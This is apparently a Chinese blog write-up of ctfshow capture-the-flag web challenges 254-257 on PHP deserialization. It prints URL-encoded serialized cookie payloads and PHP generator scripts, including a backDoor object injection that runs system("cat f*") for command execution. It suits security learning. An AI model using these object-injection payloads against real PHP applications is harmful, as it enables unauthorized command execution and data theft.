ctfshow web入门反序列化 web254-257

最新推荐文章于 2024-04-28 14:27:57 发布
最新推荐文章于 2024-04-28 14:27:57 发布
阅读量562 收藏
点赞数
分类专栏: ctfshow通关 文章标签: 前端 java 运维 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/130295358
版权

1.web254

在这里插入图片描述
定义了一个类ctfshowuser,定义了三个变量,定义了了三个函数,这题只要使isVip变量为true即可,就是传入的username和password和原来定义的变量值相等
payload:

username=xxxxxx&password=xxxxxx

2.web255

在这里插入图片描述
这题需要在cookie中传递使isVip为true即可,并且需要进行序列化操作
paylaod:

cookie传入,get请求usernmae=xxxxxx&password=xxxxxx
user=O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

生成序列化内容
class ctfShowUser{
    public $isVip=True;    
}
$user = urlencode(serialize(new ctfShowUser()));
echo $user;

?>

在这里插入图片描述

3.web256

在这里插入图片描述
注意login函数是做判断最后返回true或false的,而不是赋值的意思,这题只要username和password不相等即可,isvip还要为true,通过序列化内容达到覆盖掉原有变量的效果
payload:

cookie传入,get请求usernmae=a&password=xxxxxx
user=O%3A11%3A%22ctfShowUser%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A1%3A%22a%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D
生成序列化内容
class ctfShowUser{
    public $username='a';
    public $isVip=True;  
}

echo urlencode(serialize(new ctfShowUser()));

在这里插入图片描述
4.web257
在这里插入图片描述
有三个类,想要执行命令就需要使用backdoor这个类,看到在对象执行结束执行了getinfo方法,而getinfo在backdoor类中是执行命令的方法,所以在对象创建的时候可以换成backdoor这个类,构造code变量,在对象结束后就可以执行查看flag的命令
paylaod:

cookie传入,get请求usernmae=xxxxxx&password=xxxxxx
user=O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A17%3A%22system%28%22cat+f%2A%22%29%3B%22%3B%7D%7D
生成序列化内容
class ctfShowUser{
    public function __construct(){
       $this->class=new backDoor();
   }
}
class backDoor{
   private $code='system("cat f*");';
}
echo urlencode(serialize(new ctfShowUser()));

在这里插入图片描述
参考文章:
ctfshow反序列化

mushangqiujin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow 序列 web257
Kradress的博客
12-19 1839
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 20:33:07 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight
grpc-web-error-details:在grpc-web序列`grpc-status-details-bin`元数据的实用程序功能
05-15
使用时序列grpc-web-details-bin元数据值的实用程序功能。 动机 。 由错误状态代码和可选的字符串错误消息组成的标准错误模型是“官方” gRPC错误模型。 如果您使用的是协议缓冲区,则还可以使用Google开发和...
ctfshow-web257(序列)
m0_62094846的博客
02-23 1800
__destruct()是PHP面向对象编程的另一个重要的魔法函数,该函数会在类的一个对象被删除时自动调用。 我们可以在该函数中添加一些释放资源的操作,比如关闭文件、关闭数据库链接、清空一个结果集等。其实,__destruct()在日常的编码中并不常见,因为它是非必须的,是类的可选组成部分。通常只是用来完成对象被删除时的清理动作而已。 类中的getinfo()方法通常用于获取一些信息。(java的,php的没找到) <?php /* # -*- coding: utf-8 -*- # ...
ctfshow web255 web 256 web257
姜小孩的博客
07-02 1342
目录web255web256附代码 整体的思路和上一题差不多只是多了一句 可以看到unserialize就是序列,所以需要我们序列一些东西,通过cookie的user变量传入,改变这个数据。 这段代码无法让isVip为true,所以我们就需要通过user这个变量改变isVip的值。直接把类拿过来,只有类和变量会被序列,其他都可以去掉。 所以参入参数就是拿到flag,债见!!附代码 ​ 这个题的关键点在于username和password不相等,因为都是强比较,所以我们传入
ctfshow web入门 序列(254~257详解)
WRplayeR的博客
04-12 407
php序列的简单学习
[WP/WEB/序列/未完]CTFshow-web257-268
車鈊的博客
10-12 958
Web257 <?php class ctfShowUser{ private $username='xxxxxx'; private $password='xxxxxx'; private $isVip=false; private $class = 'info'; public function __construct(){ $this->class=new backDoor(); } public function
ShiroExp-1.3.1-all.jar shiro序列检测工具
01-12
ShiroExp-1.3.1-all.jar shiro序列检测工具 我这里是用于搭建攻防演练演示环境用
Java序列实战.pdf
08-08
本议题将从那些经典案例入手,分析攻击方和防御方的对抗过程。会从fastjson与weblogic的两个经典漏洞,带大家傲游序列的世界。 序列入门 Fastjson Weblogic 序列防御
第38天:WEB漏洞-序列之PHP&JAVA全解(下)1
08-03
标题中的“WEB漏洞-序列之PHP&JAVA全解(下)”指的是关于Web应用程序安全领域的一个重要话题,即PHP和JAVA平台上的序列漏洞。序列漏洞是由于程序在处理序列数据时没有充分验证输入,从而允许攻击者构造...
java序列工具
11-21
Java序列是一种将已序列的对象状态转换回对象的过程,它是Java平台中持久数据的一种常见方式。在Java应用程序中,序列用于保存对象的状态以便稍后恢复,或者在网络间传输对象。然而,这个过程也可能引入...
ctf-show,web入门,序列254~267
2301_80548709的博客
03-23 1008
而%user变量后接了一个序列的函数,我们只需要写一个脚本,将创建类的将本序列,传给cookie,同时注意到,源程序种没有将isVip更改的函数,所以序列时这里也要注意,最后将其转码为url编码即可使用。
CTFshow——web入门——序列web254-web278 详细Writeup
Leaf_initial的博客
08-24 2085
在做题之前先简要总结一下知识点。
CTFshow刷题日记-WEB-序列篇(上,254-263)
Love&Share
09-22 2710
序列 web254-简单审计 这个题是搞笑的么???? 按着源码顺序走一遍 ...... $username=$_GET['username']; $password=$_GET['password']; if(isset($username) && isset($password)){ $user = new ctfShowUser(); if($user->login($username,$password)){ if($user->c
CTFshow 序列 web254
Kradress的博客
12-19 248
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight
ctf.show序列(web254-web278)
wanan的博客
08-31 6483
ctf.show序列(web254-web278)
ctfshow 序列Web254-255
m0_62584974的博客
04-21 2233
2022/4/17 序列漏洞的产生主要有以下两个原因: 1. unserialize 函数的参数可控。 2.存在魔法函数。 魔法函数 __construct,__destruct,__call,__callStatic,__get,__set,__isset,__unset,__sleep,__wakeup,__toString,__invoke,__set_state,__clone和__debuginfo等成员函数在PHP中被称为魔法函数。在命名自己的类方法时不能使用这些名称,除非是想使用其
CTFShow序列web254-8题wp
最新发布
observer的博客
04-28 831
PHP序列ctfshow254-8
渗透学习-CTF篇-web-CTFshow(仅有部分,持续更新中,254-259关))
qq_43696276的博客
03-20 1341
本文将主要介绍CTFshow的关卡攻略,至于基本的原理请参考本人的其他介绍漏洞原理的博客。
CTFshow刷题日记 web 序列 web254-255
m0_73700261的博客
05-09 283
这个是源代码,这里的思路是这样的有两个get一个是username另一个是password,第一个if是检查是否有两个变量,接着就新建一个ctfShowUser的类,接着第二个if是一个$user->login($username,$password)对应上面的login($u,$p) 接着进入第三个if($user-checkVip())这里就进入到了$user->vipOneKeyGetFlag。cookie传入一个O:11:"ctfShowUser":1:{s:5:"isVip";
DRF框架入门序列序列的深度解析
本资源是一份名为《DRF框架基础.pdf》的文档,针对初学者介绍了Django Rest Framework (DRF) 的基础知识,主要关注序列序列的概念以及处理关联字段的问题。以下是主要内容的详细说明: **序列** 1. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值